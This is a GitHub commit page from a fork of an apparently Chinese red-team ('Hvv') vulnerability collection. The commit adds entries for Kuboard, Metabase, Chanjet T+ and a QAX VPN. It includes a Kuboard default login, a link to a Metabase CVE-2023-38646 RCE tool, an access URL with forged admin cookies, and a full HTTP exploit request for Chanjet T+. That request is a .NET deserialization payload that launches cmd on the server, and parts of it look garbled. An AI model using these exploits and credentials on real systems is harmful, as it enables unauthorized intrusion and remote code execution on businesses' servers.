forked from ibaiw/2023Hvv
-
Notifications
You must be signed in to change notification settings - Fork 0
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
Showing
5 changed files
with
64 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,5 @@ | ||
漏洞描述: | ||
|
||
Kuboard,是一款免费的 Kubernetes 图形化管理工具,Kuboard 力图帮助用户快速在 Kubernetes 上落地微服务。Kuboard存在默认口令可以通过默认口令登录Kuboard,管理Kubernetes。 | ||
|
||
admin/kuboard123 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,10 @@ | ||
# 0x01 工具介绍 | ||
|
||
CVE-2023-38646漏洞是一种高危的Metabase远程代码执行漏洞。Metabase是一个开源的数据分析和可视化工具,可以帮助用户连接到各种数据源,并进行数据查询、分析和可视化。 | ||
|
||
|
||
|
||
# 工具链接 | ||
|
||
`https://github.com/robotmikhro/CVE-2023-38646` | ||
|
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,5 @@ | ||
``` | ||
https://x.xxx.xxx.cn/admin/group/xgroupphp?id=1 | ||
https://x.xxx.xxx.cn/admin/group/xgroupphp?id=3 cookie: admin id=1; gw admin ticket=1; | ||
``` | ||
|
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -1,3 +1,13 @@ | ||
# 8月14新增 | ||
|
||
用有畅捷通T+GetStoreWarehouseByStore RCE漏洞 | ||
|
||
QAX-Vpn存在x遍历及任意账号密码修改漏洞 | ||
|
||
Kuboard默认口令 | ||
|
||
Metabase远程代码执行漏洞 | ||
|
||
|
||
|
||
# 8月13新增 | ||
|
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,34 @@ | ||
``` | ||
POST | ||
/tplus/ajaxpro/Ufida.T.CodeBehind.PriorityLevel,App Code.ashx?met hod=GetstoreWarehouseByStore HTTP/1.1 Host: | ||
User-Agent:Mozilla/5.0 (X11;Linuxx86 64)AppleWebKit/537.36(KHTML, like | ||
Gecko)Chrome/34.0.1847.137 Safari 4E423F | ||
Connection: close | ||
Content-Length:668 | ||
X-Ajaxpro-Method:GetstoreWarehouseByStore | ||
Accept-Encoding:gzip | ||
{ "storeID":{ | ||
"type":"system.Windows.Data.objectDataProvider, | ||
PresentationFramework,Version=4.0.0.0,Culture=neutral, | ||
PublicKeyToken=31bf3856ad364e35", | ||
"MethodName":"start" | ||
"objectInstance":{ | ||
" type":"system.Diagnostics.Process, | ||
System,Version=4.0.0.0, | ||
Culture=neutral, | ||
PublicKeyToken=b77a5c561934e089" | ||
"startInfo":{ | ||
" type":"system.Diagnostics.ProcessstartInfo, system, | ||
Version=4.0.0.0,Culture=neutral, | ||
PublicKeyToken=b77a5c561934e089" | ||
"FileName":"cmd", | ||
"Arguments":"/cwhoami> | ||
C:/Progra~2/Chanjet/TPlusStd/Website/2RUsL6jgx9sGX4GItBcVfxarBM.t | ||
xt" } } } } | ||
``` | ||
|